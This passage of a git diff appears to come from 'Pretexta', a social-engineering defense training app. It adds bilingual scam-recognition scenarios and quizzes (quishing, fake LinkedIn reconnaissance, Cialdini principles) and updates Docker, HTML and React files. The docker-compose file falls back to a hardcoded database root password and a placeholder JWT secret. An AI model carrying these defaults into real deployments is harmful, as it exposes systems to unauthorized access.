kertasnya berbeda dari tiket parkir asli yang pernah kamu terima." + next: choice_investigate + + - id: choice_investigate + type: question + content_en: + text: "Multiple cars have identical notices. The paper quality is off. Another driver is about to scan. What now?" + content_id: + text: "Beberapa mobil punya pemberitahuan identik. Kualitas kertas berbeda. Pengemudi lain akan memindai. Sekarang apa?" 
+ options: + - text: "Warn the other driver and call police to report the scam" + text_id: "Peringatkan pengemudi lain dan hubungi polisi untuk melaporkan penipuan" + next: good_outcome_hero + score_impact: 40 + - text: "Scan it anyway to check โ€” maybe it's real" + text_id: "Scan saja untuk cek โ€” mungkin ini asli" + next: scanned_qr + score_impact: -15 + + - id: bad_outcome_creds + type: end + result: failure + content_en: + title: "Compromised โ€” Credit Card Stolen" + explanation: "You entered your credit card details into a phishing site. The scammers will use your card for fraudulent purchases within minutes. QR code phishing ('quishing') is growing rapidly because QR codes bypass email security filters. Always check the URL before entering payment information, and verify parking fines through official city channels." + content_id: + title: "Terkompromi โ€” Kartu Kredit Dicuri" + explanation: "Kamu memasukkan detail kartu kredit ke situs phishing. Penipu akan menggunakan kartumu untuk pembelian penipuan dalam hitungan menit. Selalu cek URL sebelum memasukkan informasi pembayaran." + + - id: ignore_outcome + type: end + result: success + content_en: + title: "Safe โ€” But Could Help Others" + explanation: "Good instinct to be suspicious, but the best response is to also report the scam so others don't fall for it. Consider photographing the notice and reporting to local police and the parking authority." + content_id: + title: "Aman โ€” Tapi Bisa Bantu Orang Lain" + explanation: "Insting bagus untuk curiga, tapi respons terbaik juga melaporkan penipuan agar orang lain tidak tertipu." + + - id: good_outcome_call + type: end + result: success + content_en: + title: "Defended โ€” Official Verification" + explanation: "You called the city parking authority and they confirmed no violation was issued for your vehicle. The QR code scam was part of a wave hitting the area. 
By calling the official number (not any number on the fake notice), you verified through a trusted channel." + content_id: + title: "Berhasil Bertahan โ€” Verifikasi Resmi" + explanation: "Kamu menghubungi otoritas parkir kota dan mereka mengonfirmasi tidak ada pelanggaran yang dikeluarkan untuk kendaraanmu." + + - id: good_outcome_url + type: end + result: success + content_en: + title: "Defended โ€” URL Check Saved You" + explanation: "Checking the URL before entering payment details is a critical skill. The domain 'pay-parking-fines-city.com' is not an official government website. Real city payment portals use .gov domains. This simple check prevented credit card theft." + content_id: + title: "Berhasil Bertahan โ€” Pengecekan URL Menyelamatkanmu" + explanation: "Memeriksa URL sebelum memasukkan detail pembayaran adalah keterampilan kritis. Domain 'pay-parking-fines-city.com' bukan website pemerintah resmi." + + - id: good_outcome_hero + type: end + result: success + content_en: + title: "Defended & Protected Others" + explanation: "Outstanding response. Not only did you recognize the scam through physical evidence (paper quality, mass distribution), you also warned another potential victim and reported it to authorities. The police were able to catch the scammers who were placing notices in the parking lot. Community defense at its best." + content_id: + title: "Bertahan & Melindungi Orang Lain" + explanation: "Respons luar biasa. Kamu tidak hanya mengenali penipuan melalui bukti fisik, tapi juga memperingatkan calon korban lain dan melaporkan ke pihak berwenang." diff --git a/data/sample/2025-01-17-insider-recon.yaml b/data/sample/2025-01-17-insider-recon.yaml new file mode 100644 index 0000000..21c2f82 --- /dev/null +++ b/data/sample/2025-01-17-insider-recon.yaml @@ -0,0 +1,174 @@ +type: challenge +title: "The Conference Contact" +description: "Someone from a recent conference reaches out to connect. But they're gathering intelligence on your company." 
+difficulty: medium +cialdini_categories: + - liking + - reciprocity + - social_proof +estimated_time: 12 +metadata: + author: "Pretexta" + tags: [reconnaissance, pretexting, osint, linkedin, social-engineering] + +nodes: + - id: start + type: message + channel: linkedin + content_en: + sender: "Jordan Mitchell โ€” Senior Analyst, CyberDefend Corp" + message: "Hey! We met briefly at the CyberSec Summit last week โ€” you were at the Zero Trust panel, right? I loved your question about micro-segmentation. Small world! I'd love to connect and maybe pick your brain about how your team handles identity governance. We're revamping our approach and your org always comes up as a reference." + content_id: + sender: "Jordan Mitchell โ€” Analis Senior, CyberDefend Corp" + message: "Hei! Kita bertemu singkat di CyberSec Summit minggu lalu โ€” kamu di panel Zero Trust, kan? Saya suka pertanyaan kamu tentang micro-segmentation. Dunia kecil! Saya ingin terhubung dan mungkin diskusi tentang bagaimana tim kamu menangani identity governance." + next: choice_1 + + - id: choice_1 + type: question + content_en: + text: "A LinkedIn connection request from someone who claims to have met you at a conference. They're flattering and want to discuss your team's security practices. What do you do?" + content_id: + text: "Permintaan koneksi LinkedIn dari seseorang yang mengaku bertemu di konferensi. Mereka memuji dan ingin mendiskusikan praktik keamanan timmu. Apa yang kamu lakukan?" 
+ options: + - text: "Accept and share details about your security stack โ€” networking is important" + text_id: "Terima dan bagikan detail tentang stack keamanan โ€” networking itu penting" + next: bad_outcome_overshare + score_impact: -30 + - text: "Accept the connection but keep responses vague and professional" + text_id: "Terima koneksi tapi jaga respons tetap samar dan profesional" + next: vague_response + score_impact: 10 + - text: "Check their profile thoroughly before responding" + text_id: "Cek profil mereka dengan teliti sebelum merespons" + next: check_profile + score_impact: 20 + - text: "Decline โ€” you don't remember meeting them" + text_id: "Tolak โ€” kamu tidak ingat bertemu mereka" + next: good_outcome_decline + score_impact: 15 + + - id: vague_response + type: message + channel: linkedin + content_en: + sender: "Jordan Mitchell" + message: "Totally understand keeping things high-level! Hey, completely unrelated โ€” are you guys still using CrowdStrike or did you migrate to SentinelOne? A buddy at your company mentioned something about a migration but I wasn't sure. Also, is your CISO still that ex-NSA person? They gave a great talk at BlackHat. Would love an intro if possible!" + content_id: + sender: "Jordan Mitchell" + message: "Sangat mengerti menjaga hal-hal tetap umum! Hei, sama sekali tidak terkait โ€” kalian masih pakai CrowdStrike atau sudah migrasi ke SentinelOne? Teman di perusahaan kamu menyebutkan sesuatu tentang migrasi. Juga, CISO kamu masih orang ex-NSA itu? Mereka memberikan talk hebat di BlackHat." + next: choice_escalation + + - id: choice_escalation + type: question + content_en: + text: "Jordan is now asking specific questions about your security tools, organizational structure, and wants introductions to executives. This is escalating from networking to intelligence gathering. What do you do?" 
+ content_id: + text: "Jordan sekarang menanyakan pertanyaan spesifik tentang alat keamanan, struktur organisasi, dan ingin diperkenalkan ke eksekutif. Ini meningkat dari networking ke pengumpulan intelijen. Apa yang kamu lakukan?" + options: + - text: "Answer their questions โ€” they seem well-connected in the industry" + text_id: "Jawab pertanyaan mereka โ€” mereka tampak memiliki koneksi baik di industri" + next: bad_outcome_intel + score_impact: -40 + - text: "Recognize this as social engineering reconnaissance and report to your security team" + text_id: "Kenali ini sebagai pengintaian social engineering dan laporkan ke tim keamanan" + next: good_outcome_reported + score_impact: 35 + - text: "Stop engaging and block the contact" + text_id: "Berhenti berinteraksi dan blokir kontak" + next: good_outcome_block + score_impact: 20 + + - id: check_profile + type: message + channel: narrator + content_en: + text: "You examine Jordan's LinkedIn profile. 347 connections, but only 12 mutual. Their profile was created 2 months ago. Job history shows 3 companies in the last year. No posts or articles. Their profile photo appears in a reverse image search on a stock photo website. 'CyberDefend Corp' has no website or other employees on LinkedIn." + content_id: + text: "Kamu memeriksa profil LinkedIn Jordan. 347 koneksi, tapi hanya 12 mutual. Profil dibuat 2 bulan lalu. Riwayat pekerjaan menunjukkan 3 perusahaan dalam setahun terakhir. Tidak ada postingan. Foto profil muncul di pencarian gambar terbalik di website foto stok. 'CyberDefend Corp' tidak punya website." + next: choice_profile + + - id: choice_profile + type: question + content_en: + text: "The profile has multiple red flags: new account, stock photo, fake company. This appears to be a social engineering front. What do you do?" + content_id: + text: "Profil memiliki beberapa tanda bahaya: akun baru, foto stok, perusahaan palsu. Ini tampaknya front social engineering. Apa yang kamu lakukan?" 
+ options: + - text: "Report the fake profile and alert your security team" + text_id: "Laporkan profil palsu dan peringatkan tim keamanan" + next: good_outcome_osint + score_impact: 40 + - text: "Ignore and move on" + text_id: "Abaikan dan lanjutkan" + next: ignore_outcome + score_impact: 10 + + - id: bad_outcome_overshare + type: end + result: failure + content_en: + title: "Compromised โ€” Intelligence Gathered" + explanation: "You shared details about your security tools, team structure, and processes with a social engineering operative. This information will be used to craft targeted attacks against your organization โ€” knowing your security stack helps attackers design evasion techniques. Never share specific security tool names, team structures, or processes with unverified contacts." + content_id: + title: "Terkompromi โ€” Intelijen Terkumpul" + explanation: "Kamu membagikan detail tentang alat keamanan, struktur tim, dan proses dengan operatif social engineering. Informasi ini akan digunakan untuk membuat serangan terarah." + + - id: bad_outcome_intel + type: end + result: failure + content_en: + title: "Compromised โ€” Full Reconnaissance Complete" + explanation: "The attacker now has your security vendor names, CISO identity, and organizational structure. This is a textbook pre-attack reconnaissance operation. The information gathered will be used for: spear-phishing your CISO, crafting payloads that evade your specific security tools, and social engineering other employees using your name as a reference." + content_id: + title: "Terkompromi โ€” Pengintaian Penuh Selesai" + explanation: "Penyerang sekarang memiliki nama vendor keamanan, identitas CISO, dan struktur organisasi. Ini adalah operasi pengintaian pra-serangan." 
+ + - id: ignore_outcome + type: end + result: success + content_en: + title: "Safe โ€” But Report Would Help" + explanation: "You avoided the trap, but reporting the fake profile to LinkedIn and your security team would help protect other colleagues who might receive similar requests." + content_id: + title: "Aman โ€” Tapi Melaporkan Akan Membantu" + explanation: "Kamu menghindari jebakan, tapi melaporkan profil palsu ke LinkedIn dan tim keamanan akan membantu melindungi rekan lain." + + - id: good_outcome_decline + type: end + result: success + content_en: + title: "Defended โ€” Trusted Your Instinct" + explanation: "Not remembering someone who claims to have met you is a valid reason to decline. Social engineers count on politeness overriding caution. It's perfectly acceptable to not accept connection requests from people you can't verify." + content_id: + title: "Berhasil Bertahan โ€” Percaya Insting" + explanation: "Tidak mengingat seseorang yang mengaku bertemu adalah alasan valid untuk menolak. Social engineer mengandalkan kesopanan mengatasi kewaspadaan." + + - id: good_outcome_reported + type: end + result: success + content_en: + title: "Defended โ€” Pattern Recognition" + explanation: "You recognized the escalation pattern: flattery โ†’ rapport โ†’ specific technical questions โ†’ executive introductions. This is a classic social engineering kill chain for reconnaissance. Your report helped the security team identify a broader campaign targeting multiple employees." + content_id: + title: "Berhasil Bertahan โ€” Pengenalan Pola" + explanation: "Kamu mengenali pola eskalasi: pujian โ†’ rapport โ†’ pertanyaan teknis spesifik โ†’ perkenalan eksekutif. Ini adalah kill chain social engineering klasik untuk pengintaian." + + - id: good_outcome_block + type: end + result: success + content_en: + title: "Defended โ€” Disengaged" + explanation: "Good decision to stop engaging once the questions became too specific. Blocking prevents further contact attempts. 
Consider also reporting to your security team so they can check if other employees received similar requests." + content_id: + title: "Berhasil Bertahan โ€” Pemutusan Kontak" + explanation: "Keputusan bagus untuk berhenti berinteraksi setelah pertanyaan menjadi terlalu spesifik." + + - id: good_outcome_osint + type: end + result: success + content_en: + title: "Defended โ€” OSINT Investigation" + explanation: "Outstanding investigative skills. You used open-source intelligence techniques to uncover a fake persona: stock photo, new account, fictitious company. Your report to both LinkedIn and your security team helped take down the fake profile and alerted the security community about the campaign." + content_id: + title: "Berhasil Bertahan โ€” Investigasi OSINT" + explanation: "Keterampilan investigatif luar biasa. Kamu menggunakan teknik open-source intelligence untuk mengungkap persona palsu: foto stok, akun baru, perusahaan fiktif." diff --git a/data/sample/quiz-04-advanced-threats.yaml b/data/sample/quiz-04-advanced-threats.yaml new file mode 100644 index 0000000..9dd6aa0 --- /dev/null +++ b/data/sample/quiz-04-advanced-threats.yaml @@ -0,0 +1,188 @@ +type: quiz +title: "Advanced Social Engineering Threats" +description: "Test your knowledge of modern AI-powered attacks, deepfakes, and sophisticated social engineering techniques." +difficulty: hard +cialdini_categories: + - authority + - urgency + - social_proof +metadata: + author: "Pretexta" + tags: [deepfake, ai-attack, mfa, quishing, advanced] + +questions: + - id: q1 + content_en: + text: "What is 'MFA fatigue' attack?" + explanation: "MFA fatigue involves bombarding a user with repeated push notifications until they approve one out of frustration or to make the notifications stop. This has been used in high-profile breaches at companies like Uber and Cisco." + content_id: + text: "Apa itu serangan 'MFA fatigue'?" 
+ explanation: "MFA fatigue melibatkan pemboman pengguna dengan notifikasi push berulang sampai mereka menyetujui satu karena frustrasi." + options: + - text: "Flooding a target with MFA push notifications until they approve one" + text_id: "Membanjiri target dengan notifikasi push MFA sampai mereka menyetujui satu" + correct: true + - text: "Brute-forcing MFA codes" + text_id: "Brute-force kode MFA" + correct: false + - text: "Disabling MFA through an admin panel" + text_id: "Menonaktifkan MFA melalui panel admin" + correct: false + - text: "Intercepting MFA tokens via man-in-the-middle" + text_id: "Mencegat token MFA via man-in-the-middle" + correct: false + points: 15 + + - id: q2 + content_en: + text: "How much audio does an AI voice cloning system typically need to create a convincing clone?" + explanation: "Modern AI voice cloning (tools like ElevenLabs, Resemble.AI) can create convincing voice clones from as little as 3-10 seconds of audio, often sourced from social media videos, voicemails, or podcast appearances." + content_id: + text: "Berapa banyak audio yang biasanya dibutuhkan sistem kloning suara AI untuk membuat klon yang meyakinkan?" + explanation: "Kloning suara AI modern dapat membuat klon suara meyakinkan dari audio sesingkat 3-10 detik." + options: + - text: "At least 1 hour of recordings" + text_id: "Minimal 1 jam rekaman" + correct: false + - text: "30 minutes of clean audio" + text_id: "30 menit audio bersih" + correct: false + - text: "As little as 3-10 seconds" + text_id: "Sesingkat 3-10 detik" + correct: true + - text: "At least 5 minutes" + text_id: "Minimal 5 menit" + correct: false + points: 20 + + - id: q3 + content_en: + text: "What is 'quishing'?" + explanation: "Quishing (QR phishing) uses malicious QR codes to redirect victims to credential-harvesting or malware-downloading websites. It's growing because QR codes bypass email security filters and are difficult to inspect before scanning." + content_id: + text: "Apa itu 'quishing'?" 
+ explanation: "Quishing (QR phishing) menggunakan kode QR berbahaya untuk mengarahkan korban ke website pencurian kredensial atau pengunduhan malware." + options: + - text: "Phishing through quiz websites" + text_id: "Phishing melalui website kuis" + correct: false + - text: "Phishing using malicious QR codes" + text_id: "Phishing menggunakan kode QR berbahaya" + correct: true + - text: "Quick phishing campaigns that last under an hour" + text_id: "Kampanye phishing cepat yang berlangsung kurang dari satu jam" + correct: false + - text: "Phishing that targets executives (queens/kings of the company)" + text_id: "Phishing yang menargetkan eksekutif" + correct: false + points: 10 + + - id: q4 + content_en: + text: "In a deepfake video call, which is the MOST reliable way to verify the caller's identity?" + explanation: "Out-of-band verification โ€” contacting the person through a completely different, trusted channel that YOU initiate โ€” is the gold standard. Deepfakes can replicate visual appearance, voice, and even mannerisms, but they cannot simultaneously compromise a separate communication channel." + content_id: + text: "Dalam video call deepfake, mana cara PALING andal untuk memverifikasi identitas penelepon?" + explanation: "Verifikasi out-of-band โ€” menghubungi orang melalui channel berbeda dan terpercaya yang KAMU inisiasi โ€” adalah standar emas." 
+ options: + - text: "Ask them to show their employee badge on camera" + text_id: "Minta mereka menunjukkan badge karyawan di kamera" + correct: false + - text: "Verify through a separate, trusted communication channel you initiate" + text_id: "Verifikasi melalui channel komunikasi terpisah dan terpercaya yang kamu inisiasi" + correct: true + - text: "Ask them personal questions about recent meetings" + text_id: "Ajukan pertanyaan pribadi tentang rapat terbaru" + correct: false + - text: "Check if their background matches their usual office" + text_id: "Cek apakah background mereka cocok dengan kantor biasanya" + correct: false + points: 20 + + - id: q5 + content_en: + text: "What is the 'pretexting reconnaissance' kill chain?" + explanation: "Social engineering reconnaissance follows a predictable pattern: build rapport through flattery and shared interests, then gradually escalate to specific questions about tools, people, and processes. Each step feels natural but collectively maps the organization's attack surface." + content_id: + text: "Apa itu kill chain 'pengintaian pretexting'?" + explanation: "Pengintaian social engineering mengikuti pola yang dapat diprediksi: membangun rapport melalui pujian, lalu bertahap meningkat ke pertanyaan spesifik." 
+ options: + - text: "Malware → Exploitation → Exfiltration → Cover tracks" + text_id: "Malware → Eksploitasi → Eksfiltrasi → Tutup jejak" + correct: false + - text: "Scan → Enumerate → Exploit → Privilege escalation" + text_id: "Scan → Enumerasi → Eksploitasi → Eskalasi privilege" + correct: false + - text: "Flattery → Rapport → Specific questions → Executive access" + text_id: "Pujian → Rapport → Pertanyaan spesifik → Akses eksekutif" + correct: true + - text: "Phishing → Credential theft → Lateral movement → Data exfiltration" + text_id: "Phishing → Pencurian kredensial → Pergerakan lateral → Eksfiltrasi data" + correct: false + points: 15 + + - id: q6 + content_en: + text: "If someone claiming to be from IT calls you during an MFA bombing attack, what should you do?" + explanation: "Legitimate IT security will never call you and ask you to approve MFA pushes. Always hang up and contact IT through official channels you find independently. The caller may be the attacker coordinating the social engineering component of the MFA fatigue attack." + content_id: + text: "Jika seseorang yang mengaku dari IT meneleponmu selama serangan MFA bombing, apa yang harus kamu lakukan?" + explanation: "Keamanan IT yang sah tidak akan pernah menelepon dan meminta kamu menyetujui push MFA. Selalu tutup telepon dan hubungi IT melalui channel resmi." 
+ options: + - text: "Follow their instructions to secure your account" + text_id: "Ikuti instruksi mereka untuk mengamankan akun" + correct: false + - text: "Approve the next push as they suggest" + text_id: "Setujui push berikutnya seperti yang mereka sarankan" + correct: false + - text: "Hang up and call IT through official channels you find independently" + text_id: "Tutup telepon dan hubungi IT melalui channel resmi yang kamu temukan sendiri" + correct: true + - text: "Ask for their employee ID to verify" + text_id: "Minta ID karyawan mereka untuk verifikasi" + correct: false + points: 20 + + - id: q7 + content_en: + text: "What is the best defense against AI voice cloning scams targeting family members?" + explanation: "A pre-established family code word that only real family members know is the most reliable defense. AI can clone voice and emotional patterns, but cannot know a secret word that was agreed upon in person. This is a simple, effective countermeasure recommended by security experts." + content_id: + text: "Apa pertahanan terbaik terhadap penipuan kloning suara AI yang menargetkan anggota keluarga?" + explanation: "Kata sandi keluarga yang telah ditetapkan sebelumnya yang hanya diketahui anggota keluarga asli adalah pertahanan paling andal." + options: + - text: "Never answer calls from unknown numbers" + text_id: "Jangan pernah menjawab panggilan dari nomor tidak dikenal" + correct: false + - text: "Establish a family code word for emergencies" + text_id: "Tetapkan kata sandi keluarga untuk keadaan darurat" + correct: true + - text: "Ask them to video call instead" + text_id: "Minta mereka video call" + correct: false + - text: "Install a voice verification app" + text_id: "Instal aplikasi verifikasi suara" + correct: false + points: 15 + + - id: q8 + content_en: + text: "Which red flag is MOST indicative of a fake LinkedIn profile used for reconnaissance?" 
+ explanation: "A reverse image search revealing that the profile photo is a stock photo is the most definitive indicator of a fake profile. Other red flags (new accounts, few posts) could apply to real people, but a stock photo proves intentional deception." + content_id: + text: "Tanda bahaya mana yang PALING menunjukkan profil LinkedIn palsu yang digunakan untuk pengintaian?" + explanation: "Pencarian gambar terbalik yang mengungkap bahwa foto profil adalah foto stok merupakan indikator paling definitif dari profil palsu." + options: + - text: "Profile created recently with few connections" + text_id: "Profil dibuat baru-baru ini dengan sedikit koneksi" + correct: false + - text: "No posts or articles shared" + text_id: "Tidak ada postingan atau artikel yang dibagikan" + correct: false + - text: "Profile photo found on stock photo websites via reverse image search" + text_id: "Foto profil ditemukan di website foto stok via pencarian gambar terbalik" + correct: true + - text: "Multiple job changes in a short period" + text_id: "Beberapa pergantian pekerjaan dalam waktu singkat" + correct: false + points: 15 diff --git a/data/sample/quiz-05-cialdini-mastery.yaml b/data/sample/quiz-05-cialdini-mastery.yaml new file mode 100644 index 0000000..0bf67ed --- /dev/null +++ b/data/sample/quiz-05-cialdini-mastery.yaml @@ -0,0 +1,170 @@ +type: quiz +title: "Cialdini Principles Mastery" +description: "Can you identify which psychological principles attackers are exploiting? Advanced quiz on Cialdini's 6 Principles of Influence." +difficulty: medium +cialdini_categories: + - authority + - urgency + - scarcity + - reciprocity + - liking + - social_proof + - commitment +metadata: + author: "Pretexta" + tags: [cialdini, psychology, principles, advanced] + +questions: + - id: q1 + content_en: + text: "An attacker says: 'I already helped you bypass that firewall issue last week, remember? Now I just need a small favor...' Which principle is being exploited?" 
+ explanation: "Reciprocity: the attacker creates a sense of obligation by claiming to have done a favor first. People feel compelled to return favors, even when the original 'favor' may have been unsolicited or fabricated." + content_id: + text: "Penyerang berkata: 'Saya sudah membantu kamu melewati masalah firewall minggu lalu, ingat? Sekarang saya hanya butuh bantuan kecil...' Prinsip mana yang dieksploitasi?" + explanation: "Reciprocity: penyerang menciptakan rasa kewajiban dengan mengklaim telah memberikan bantuan terlebih dahulu." + options: + - text: "Authority" + text_id: "Otoritas" + correct: false + - text: "Reciprocity" + text_id: "Timbal Balik" + correct: true + - text: "Social Proof" + text_id: "Bukti Sosial" + correct: false + - text: "Scarcity" + text_id: "Kelangkaan" + correct: false + points: 10 + + - id: q2 + content_en: + text: "'Everyone on the team already shared their passwords for the security audit. You're the last one.' Which principle?" + explanation: "Social Proof: by claiming that everyone else has already complied, the attacker leverages the human tendency to follow the behavior of others, especially peers in the same group." + content_id: + text: "'Semua orang di tim sudah membagikan password mereka untuk audit keamanan. Kamu yang terakhir.' Prinsip mana?" + explanation: "Social Proof: dengan mengklaim semua orang sudah mematuhi, penyerang memanfaatkan kecenderungan manusia untuk mengikuti perilaku orang lain." + options: + - text: "Commitment" + text_id: "Komitmen" + correct: false + - text: "Liking" + text_id: "Ketertarikan" + correct: false + - text: "Social Proof" + text_id: "Bukti Sosial" + correct: true + - text: "Authority" + text_id: "Otoritas" + correct: false + points: 10 + + - id: q3 + content_en: + text: "'You agreed to help with Phase 1, so naturally we assumed you'd continue to Phase 2 which requires admin access.' Which principle?" 
+ explanation: "Commitment & Consistency: once someone has agreed to a small request, they feel psychologically compelled to stay consistent with that commitment, even when the follow-up request is much larger (foot-in-the-door technique)." + content_id: + text: "'Kamu sudah setuju membantu Fase 1, jadi kami berasumsi kamu akan melanjutkan ke Fase 2 yang memerlukan akses admin.' Prinsip mana?" + explanation: "Komitmen & Konsistensi: setelah seseorang setuju pada permintaan kecil, mereka merasa terdorong untuk tetap konsisten." + options: + - text: "Commitment & Consistency" + text_id: "Komitmen & Konsistensi" + correct: true + - text: "Authority" + text_id: "Otoritas" + correct: false + - text: "Reciprocity" + text_id: "Timbal Balik" + correct: false + - text: "Urgency" + text_id: "Urgensi" + correct: false + points: 15 + + - id: q4 + content_en: + text: "'This offer expires in 15 minutes. After that, the price doubles and we can't guarantee availability.' Which TWO principles are at play?" + explanation: "Scarcity (limited availability, time constraint) combined with Urgency (must act NOW). These two principles are frequently paired because they both create fear of missing out (FOMO) and bypass rational deliberation." + content_id: + text: "'Penawaran ini berakhir dalam 15 menit. Setelah itu, harga dua kali lipat dan kami tidak bisa menjamin ketersediaan.' DUA prinsip mana yang berlaku?" + explanation: "Kelangkaan (ketersediaan terbatas) dikombinasikan dengan Urgensi (harus bertindak SEKARANG)." 
+ options: + - text: "Authority and Liking" + text_id: "Otoritas dan Ketertarikan" + correct: false + - text: "Social Proof and Commitment" + text_id: "Bukti Sosial dan Komitmen" + correct: false + - text: "Scarcity and Urgency" + text_id: "Kelangkaan dan Urgensi" + correct: true + - text: "Reciprocity and Social Proof" + text_id: "Timbal Balik dan Bukti Sosial" + correct: false + points: 15 + + - id: q5 + content_en: + text: "An attacker researches your hobbies, favorite sports team, and alma mater before contact. During conversation they mention shared interests. Which principle?" + explanation: "Liking: people are more likely to comply with requests from people they like. By mirroring interests, shared backgrounds, and complimenting the target, attackers build artificial rapport that lowers the target's guard." + content_id: + text: "Penyerang meneliti hobi, tim olahraga favorit, dan almamater kamu sebelum menghubungi. Selama percakapan mereka menyebutkan minat bersama. Prinsip mana?" + explanation: "Liking: orang lebih cenderung mematuhi permintaan dari orang yang mereka sukai." + options: + - text: "Social Proof" + text_id: "Bukti Sosial" + correct: false + - text: "Liking" + text_id: "Ketertarikan" + correct: true + - text: "Reciprocity" + text_id: "Timbal Balik" + correct: false + - text: "Commitment" + text_id: "Komitmen" + correct: false + points: 10 + + - id: q6 + content_en: + text: "Which combination of Cialdini principles makes CEO fraud (BEC) so effective?" + explanation: "CEO fraud combines Authority (impersonating a C-level executive) with Urgency (must act now, confidential) and often Commitment (you've always been reliable). This combination attacks from multiple psychological angles simultaneously." + content_id: + text: "Kombinasi prinsip Cialdini mana yang membuat CEO fraud (BEC) sangat efektif?" + explanation: "CEO fraud menggabungkan Otoritas dengan Urgensi dan sering Komitmen." 
+ options: + - text: "Liking + Reciprocity + Social Proof" + text_id: "Ketertarikan + Timbal Balik + Bukti Sosial" + correct: false + - text: "Authority + Urgency + Commitment" + text_id: "Otoritas + Urgensi + Komitmen" + correct: true + - text: "Scarcity + Social Proof + Liking" + text_id: "Kelangkaan + Bukti Sosial + Ketertarikan" + correct: false + - text: "Reciprocity + Authority + Scarcity" + text_id: "Timbal Balik + Otoritas + Kelangkaan" + correct: false + points: 20 + + - id: q7 + content_en: + text: "What is the 'foot-in-the-door' technique?" + explanation: "The foot-in-the-door technique exploits Commitment & Consistency. By getting someone to agree to a small, harmless request first, the attacker can later escalate to larger requests because people want to remain consistent with their prior behavior." + content_id: + text: "Apa itu teknik 'foot-in-the-door'?" + explanation: "Teknik foot-in-the-door mengeksploitasi Komitmen & Konsistensi." + options: + - text: "Physically blocking a door to tailgate into a building" + text_id: "Secara fisik memblokir pintu untuk masuk ke gedung" + correct: false + - text: "Starting with a small request to build toward a larger one" + text_id: "Memulai dengan permintaan kecil untuk membangun ke yang lebih besar" + correct: true + - text: "Using a USB drive left at an office door" + text_id: "Menggunakan USB drive yang ditinggalkan di depan pintu kantor" + correct: false + - text: "Impersonating a delivery person to gain building access" + text_id: "Menyamar sebagai kurir untuk mendapatkan akses gedung" + correct: false + points: 10 diff --git a/docker-compose.yml b/docker-compose.yml index 3ac7c90..1cb032c 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -1,21 +1,25 @@ -version: '3.8' - services: mongodb: image: mongo:7.0 container_name: soceng_mongodb restart: unless-stopped environment: - MONGO_INITDB_ROOT_USERNAME: soceng_admin - MONGO_INITDB_ROOT_PASSWORD: soceng_secure_password_2025 - MONGO_INITDB_DATABASE: 
Pretexta + MONGO_INITDB_ROOT_USERNAME: ${MONGO_USERNAME:-soceng_admin} + MONGO_INITDB_ROOT_PASSWORD: ${MONGO_PASSWORD:-soceng_secure_password_2025} + MONGO_INITDB_DATABASE: ${DB_NAME:-Pretexta} volumes: - mongodb_data:/data/db - ./docker/mongo-init.js:/docker-entrypoint-initdb.d/mongo-init.js:ro ports: - - "27017:27017" + - "${MONGO_PORT:-47017}:27017" networks: - soceng_network + healthcheck: + test: ["CMD", "mongosh", "--eval", "db.adminCommand('ping')"] + interval: 10s + timeout: 5s + retries: 5 + start_period: 30s backend: build: @@ -24,40 +28,54 @@ services: container_name: soceng_backend restart: unless-stopped environment: - MONGO_URL: mongodb://soceng_admin:soceng_secure_password_2025@mongodb:27017/Pretexta?authSource=admin - DB_NAME: Pretexta + MONGO_URL: mongodb://${MONGO_USERNAME:-soceng_admin}:${MONGO_PASSWORD:-soceng_secure_password_2025}@mongodb:27017/${DB_NAME:-Pretexta}?authSource=admin + DB_NAME: ${DB_NAME:-Pretexta} JWT_SECRET: ${JWT_SECRET:-change-this-secret-key-in-production} - CORS_ORIGINS: http://localhost:3000,http://localhost:80 + CORS_ORIGINS: ${CORS_ORIGINS:-http://localhost:${FRONTEND_PORT:-9443},http://localhost:80} volumes: - ./backend:/app - ./data:/app/data - ./bin:/app/bin ports: - - "8001:8001" + - "${BACKEND_PORT:-9442}:8001" depends_on: - - mongodb + mongodb: + condition: service_healthy networks: - soceng_network + healthcheck: + test: ["CMD", "python", "-c", "import urllib.request; urllib.request.urlopen('http://localhost:8001/api/health')"] + interval: 10s + timeout: 5s + retries: 5 + start_period: 15s command: uvicorn server:app --host 0.0.0.0 --port 8001 --reload frontend: build: context: . 
dockerfile: Dockerfile.frontend + args: + REACT_APP_BACKEND_URL: ${REACT_APP_BACKEND_URL:-http://localhost:9442} container_name: soceng_frontend restart: unless-stopped - environment: - REACT_APP_BACKEND_URL: http://localhost:8001 ports: - - "3000:3000" + - "${FRONTEND_PORT:-9443}:3000" depends_on: - - backend + backend: + condition: service_healthy networks: - soceng_network + healthcheck: + test: ["CMD", "wget", "--no-verbose", "--tries=1", "--spider", "http://localhost:3000/"] + interval: 10s + timeout: 5s + retries: 3 + start_period: 10s volumes: mongodb_data: driver: local networks: - soceng_network: \ No newline at end of file + soceng_network: diff --git a/frontend/public/index.html b/frontend/public/index.html index 7bb4ea8..dd36858 100644 --- a/frontend/public/index.html +++ b/frontend/public/index.html @@ -1,28 +1,19 @@ - + + + Pretexta | Human Defense Lab
- - - \ No newline at end of file + diff --git a/frontend/public/manifest.json b/frontend/public/manifest.json new file mode 100644 index 0000000..7624b3d --- /dev/null +++ b/frontend/public/manifest.json @@ -0,0 +1,22 @@ +{ + "short_name": "Pretexta", + "name": "Pretexta - Social Engineering Lab", + "description": "Learn to defend against social engineering attacks through interactive simulations", + "icons": [ + { + "src": "icon-192.png", + "sizes": "192x192", + "type": "image/png" + }, + { + "src": "icon-512.png", + "sizes": "512x512", + "type": "image/png" + } + ], + "start_url": ".", + "display": "standalone", + "theme_color": "#000000", + "background_color": "#000000", + "orientation": "portrait-primary" +} diff --git a/frontend/src/App.js b/frontend/src/App.js index aea93d4..0811c77 100644 --- a/frontend/src/App.js +++ b/frontend/src/App.js @@ -1,45 +1,64 @@ -import React, { useEffect, useState } from 'react'; +import React, { useEffect, useState, lazy, Suspense } from 'react'; import { BrowserRouter, Routes, Route, Navigate } from 'react-router-dom'; import { Toaster } from 'sonner'; import './i18n/config'; import './App.css'; -// Pages +// Eagerly loaded (always needed) import LoginPage from './pages/LoginPage'; -import ProfilePage from './pages/ProfilePage'; -import GlossaryPage from './pages/GlossaryPage'; // New Feature -import DashboardPage from './pages/DashboardPage'; -import ScenariosPage from './pages/ScenariosPage'; -import QuizzesPage from './pages/QuizzesPage'; -import SimulationsPage from './pages/SimulationsPage'; -import SettingsPage from './pages/SettingsPage'; -import InstallerPage from './pages/InstallerPage'; -import SimulationPlayerPage from './pages/SimulationPlayerPage'; -import AIChatPage from './pages/AIChatPage'; -import QuizPlayerPage from './pages/QuizPlayerPage'; - -// 